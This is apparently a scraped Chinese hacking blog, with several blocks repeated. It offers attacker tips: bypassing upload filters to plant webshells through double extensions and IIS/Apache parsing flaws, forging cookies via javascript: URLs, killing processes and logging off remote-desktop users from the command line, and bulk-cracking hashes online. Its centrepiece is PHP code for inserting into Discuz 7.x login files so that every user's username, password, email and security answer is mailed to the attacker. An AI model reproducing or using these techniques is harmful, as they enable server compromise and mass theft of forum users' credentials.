1. 直接上传木马。
2. 上传时在后缀加空格或加几点。
木马.asp 这里后面有一个空格
木马.asp..
3. 双重扩展名:木马.asp..
木马.jpg.asp
4. IIS 漏洞
木马.asp;1.jpg
5. Apache 漏洞
木马.php.jpg
2010年2月3日星期三
Cookies 显示及修改
在网址栏打上这个代码:
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie
在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie
在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)
列举当前所有进程的PID以及结束进程的方法列举当前所有进程的PID以及结束进程的方法
以下这个脚本可以列举当前所有进程的PID:PIDlist.vbs
echo wscript.echo "PID ProcessName">>PIDlist.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>PIDlist.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>PIDlist.vbe
echo next>>PIDlist.vbe
生成pidlist.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。运行pidlist.vbe得到如下运行结果:
C:\WINNT\system32>cscript pidlist.vbe
结束进程PID 200
ntsd -c q -p 200
echo wscript.echo "PID ProcessName">>PIDlist.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>PIDlist.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>PIDlist.vbe
echo next>>PIDlist.vbe
生成pidlist.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。运行pidlist.vbe得到如下运行结果:
C:\WINNT\system32>cscript pidlist.vbe
结束进程PID 200
ntsd -c q -p 200
CMD下logoff 3389用户
C:\>hostname //得到serverName
C:\>quser /server:<serverName> //列出所有占线用户以及其sessionId
C:\>logoff <sessionId> /server:<serverName> //logoff 指定用户
C:\>quser /server:<serverName> //列出所有占线用户以及其sessionId
C:\>logoff <sessionId> /server:<serverName> //logoff 指定用户
【原创】discuz密码记录+电邮
Discuz 7.1/7.2 :include\login.func.php
Discuz 7.0:logging.php
搜索这段代码:
if(!$member) {
return -1;
}
在下面加入:
$title= $tmp['username'].' : '.$tmp['password'].' : '.$tmp['email'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
如果是要较完整的资料可以使用以下代码:
$title= $_SERVER['HTTP_HOST'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Question ID:'.$questionid.' Answer:'.$answer.' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
Discuz 7.0:logging.php
搜索这段代码:
if(!$member) {
return -1;
}
在下面加入:
$title= $tmp['username'].' : '.$tmp['password'].' : '.$tmp['email'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
如果是要较完整的资料可以使用以下代码:
$title= $_SERVER['HTTP_HOST'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Question ID:'.$questionid.' Answer:'.$answer.' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
一个能批量查找md5,sha1 hash的网站
http://www.md5decrypter.co.uk/
可以无限批量查询md5 hash,不过数量太多会很慢
Tips: 如果要查询很多hash的话(过千或上万),你可以一次过全部丢进去查找,然后就不要去管它,大约几个小时或更久的时间后,你再去1000条1000条查 询,速度非常快,估计是因为之前一次过丢进去查找的结果还保留在cache server里面. 我测过3万条数据,晚上全部丢去该server查找,第二天早上去测试,每次1000条md5 hash,大概一次只需1分钟时间。
可以无限批量查询md5 hash,不过数量太多会很慢
Tips: 如果要查询很多hash的话(过千或上万),你可以一次过全部丢进去查找,然后就不要去管它,大约几个小时或更久的时间后,你再去1000条1000条查 询,速度非常快,估计是因为之前一次过丢进去查找的结果还保留在cache server里面. 我测过3万条数据,晚上全部丢去该server查找,第二天早上去测试,每次1000条md5 hash,大概一次只需1分钟时间。
订阅:
博文 (Atom)